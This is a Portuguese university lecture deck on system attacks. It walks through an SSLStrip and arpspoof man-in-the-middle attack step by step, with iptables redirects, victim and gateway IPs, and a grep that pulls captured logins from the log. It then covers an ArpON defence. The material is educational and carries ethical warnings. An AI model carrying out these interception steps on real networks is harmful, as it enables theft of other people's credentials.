Você está na página 1de 34

Universidade Federal do Amazonas UFAM

Instituto de Cincias Exatas e Tecnologia - ICET

Segurana e Auditoria

Ataques a Sistemas

Apresentao do Professor

Sou formado pela universidade luterana do Brasil (Ulbra), Esp. pelo


instituto superior
(Fucapi) e Msc pela Univerdade Federal do
Amazonas (UFAM).
Cursos de Sistemas e Eng. Software
Professor efetivo
Disciplinas: Sistemas Distribudos e Segurana e Auditoria em
Sistemas de informao.
Email: profalbertosena@gmail.com

Roteiro da Palestra
Momentos Iniciais
- Contextualizao sobre alguns aspectos que comprometem a segurana
- Formas de ataques conhecidos

Demonstrao - Ataque a sites


Como se proteger de ataques de
interceptao de informao

Ataques a Sistemas

Voc j pode ter sido vtima e nem tomou conta!

tica e crimes virtuais


"Alguns qualificam o espao ciberntico
como

um

novo

mundo,

um mundo

virtual, mas no podemos nos equivocar.


No h dois mundos diferentes, um
real e outro virtual, mas apenas um, no
qual se devem aplicar e respeitar os
mesmos

valores

de

liberdade

dignidade da pessoa. (Jacques Chirac)

Contextualizao
Os ataques a computadores so aes praticadas por softwares projetados com intenes
danosas.
FINALIDADES: infectar ou invadir computadores alheios para, em seguida, danificar seus
componentes de hardware ou software, atravs da excluso de arquivos, alterando o
funcionamento da mquina ou at mesmo deixando o computador vulnervel a outros tipos
de ataques.

Porm existem os que visam os dados do usurio, com a captura de informaes sigilosas
(senhas e nmeros de cartes de crditos entre outros), alm da captura de informaes
de carter ntimo.

Contextualizao
Porm existem os que visam os dados do usurio, com a captura de informaes sigilosas
(senhas e nmeros de cartes de crditos entre outros), alm da captura de informaes
de carter ntimo.

Introduo

Introduo

Estatsticas

Ano 2012

Ano 2013

Introduo

Ataque Nosso Cenrio


Como realizar um ataque

O SSLStrip uma ferramenta de ataque Man-in-the-Middle , nesta palestra vamos


visualizar como o ataque pode ser realizado e como evitar-lo

Ateno: Roubo de Informaes CRIME, sujeito as penalidades da Lei: 12.737, o mal uso
do contedo deste artigo de sua total responsabilidade pois o mesmo tem como objetivo
destacar os riscos que estamos expostos a realizar um simples acesso a conta do UOL em
uma LanHouse por exemplo.

IMPORTANTE

A PALESTRA NO TEM COMO OBJETIVO FAZER APOLOGIA A INVASO DE


PRIVACIDADE DIGITAL

Ateno: AS TECNICAS AQUI PRESENTES DEVEM SER UTILIZADAS APENAS PARA


FINS TICOS

Main-in-The-Middle:Homem no meio, em referncia ao atacante que intercepta os dados de


uma conexo, uma forma de ataque em que os dados trocados entre duas partes podem ser
manipulados.
Cenrio:

Cenrio:
Passo 01
Ativar o ip_forward para redirecionar o trfego.
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Cenrio:
Passo 02
Crie a regra de redirecionamento no iptables da porta 80 para a porta 8080
root@kali:~# iptables -t nat -A PREROUTING -p tcp dport 80 -j REDIRECT
to-port 8080

Cenrio:
Passo 03
Execute o SSLSTRIP com as opes -a -l
root@kali:~# sslstrip -a -l 8080
-a : Acessa todo trfego HTTP e SSL DE e PARA o Servidor
-l 8080 : Define a porta de escuta (listen) Porta Padro (10000)

Cenrio:
Passo 04
Abra um novo Console e execute o ARPSPOOF
root@kali:~#arpspoof -i Wlan0 -t 10.10.10.134 10.10.2
-i Wlan0: Interface de Rede
-t: Define o Host Alvo
10.10.10.134 : IP da Vtima ( WIN-7 )
10.10.10.2: Gateway da Rede

Cenrio:
Passo 05
Imagina que a Vtima obviamente sem saber, acessa o uol e informa seu E-mail
profalberto@uol.com.br e Senha iceticet e jamais perceber que seus dados esto
sendo capturados.

Cenrio:
Passo 06
Um arquivo nomeado como sslstrip.log criado contendo todo trfego capturado, no
caso do UOL basta realizar uma busca dentro do arquivo como no exemplo abaixo:
root@kali:~#cat sslstrip.log | grep user=

Como evitar este tipo de


ataque?

Defesa:
H diversas formas de evitar este tipo de ataque, para quem
possui uma rede com equipamentos Cisco pode ativar o DSNIFF
por

exemplo,

ArpON(

Arp

ou

implantar

handler

uma

soluo

inspectiON)porm

no

Open

Source

mercado

diversas solues/equipamentos que oferecem timos recursos


para bloquear este tipo de ataque.

Defesa:
Passo 01
Instale o ArpON
root@kali:~#apt-get install arpon

Defesa:
Passo 02
Edite o arquivo de configurao do ArpON
root@kali:~#vim /etc/default/arpon

Defesa:
Passo 03
Remova o comentrio # das linhas abaixo e altere a a execuo de no
para yes
# SARPI Static Arp Inspection
DAEMON_OPTS=-q -f /var/log/arpon/arpon.log -g -s
# DARPI Dynamic Arp Inspection
DAEMON_OPTS=-q -f /var/log/arpon/arpon.log -g -s
RUN=yes

Defesa:
Passo 04
Insira os Hosts e MAC que devem ser filtrados
root@kali:~#vim /etc/arpon.sarpi

Defesa:
Passo 05
Inicieo servio do ArpON
root@kali:~#../etc/init.d/arpon start

Defesa:
Passo 06
Como exibe no arquivo de log a Proteo em Tempo Real esta ativada! ( Realtime
Protect actived! )
root@kali:~#cat /var/log/arpon/arpon.log

Dvidas?
profalbertosena@gmail.com

Você também pode gostar